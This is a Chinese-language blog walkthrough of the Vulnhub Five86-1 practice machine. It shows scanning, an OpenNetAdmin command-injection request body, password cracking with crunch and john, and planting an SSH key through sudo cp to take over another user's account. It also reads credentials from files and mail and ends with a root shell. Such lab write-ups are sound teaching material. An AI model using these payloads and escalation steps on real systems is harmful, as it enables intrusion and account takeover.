five86-1 (OpenNetadmin RCE+cp命令提权+crunch生成密码字典)

Vulnhub-Five86-1

 

实验环境

kali攻击机ip:192.168.56.116

Five86-1靶机ip:192.168.56.121

 

知识点及工具

nmap扫描

john爆破

OpenNetAdmin RCE

 

 

开始渗透

首先第一步对目标靶机网络

nmap -A –p- 192.168.56.121

 

扫描发现一个80web端口和一个22ssh端口和10000webmin端口。

Web浏览 http://192.168.56.121,页面啥都没有空白一片

使用dirb工具对目录进行扫描,或者namp扫描也有提示robots.txt和/ona目录

访问/ona

http://192.168.56.121/ona

 

发现是opennetadmin,exploit-db搜索找到两个poc一个msf的一个sh

先拿sh的文件验证一下,抓取登录包,修改请求方式为post,body添加以下代码

xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";id;echo \"END\"&xajaxargs[]=ping
发现可利用,执行成功了

脚本运行一下

./exp.sh http://192.168.56.121/ona/login.php

或者利用msf的也行,把它复制到/usr/share/metasploit-framework/modules/exploits目录下,然后重新加载msf(命令reload_all)。

set rhosts 192.168.56.121
set lhost 192.168.56.116
exploit

 

 

在此发现限制了其他目录访问,可ls,cat 等命令

然后查找一下www-data能够访问的东西

find / -type f -user www-data
在前面两个可以看到能够读取.htaccess文件
cat /var/www/html/reports/.htaccess

看到了douglas账号密码,然后提示aefhrt组合的10个字符

接下来生成密码

crunch 10 10 aefhrt > password.txt
爆破密码
john --wordlist=password.txt douglas

 

爆破出来得到密码
douglas:fatherrrrr

ssh登录

ssh douglas@192.168.56.121

找了一番 然后sudo –l 发现可cp,然后进行下一步

 

 

 

生成一个jen的ssh密钥吧,看见douglas下存在.ssh,也给jen生成一个

ssh-keygen –t rsa –C “jen@five86-1”
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys
cd /tmp
chmod 777 authorized_keys
sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/

这个就利用了cp命令

切换一个身份

ssh jen@127.0.0.1

登录成功了

 

 

 

登录之后我看见了最后一行提示了你有一封新邮件,然后查看,发现了moss的账号密码

cd  /var/maills 
cat jen

得到账号密码

moss:Fire!Fire!

 

再次切换为moss用户

su moss

 

在moss目录下发现一个.games目录下upyougame运行可root身份

 

 

随便你怎么输入只要输入个字符,然后完了就是#(root)号了

 

 

 

 

 

 转载自 :https://mp.weixin.qq.com/s?__biz=MzAwMjgwMTU1Mg==&mid=2247484162&idx=1&sn=d0d7b65b7167e910cd48c2055b436b4c&chksm=9ac5a9fdadb220eb5d778be6403bb9f5c8595e6d7208979c644f5e6d16ae2f8e32c40560673a&mpshare=1&scene=23&srcid=&sharer_sharetime=1579925317576&sharer_shareid=1979c40cd73d328af307e7b01238782f#rd

 
 

 

posted @ 2020-02-02 16:11  -Zad-  阅读(1020)  评论(0编辑  收藏  举报
jQuery火箭图标返回顶部代码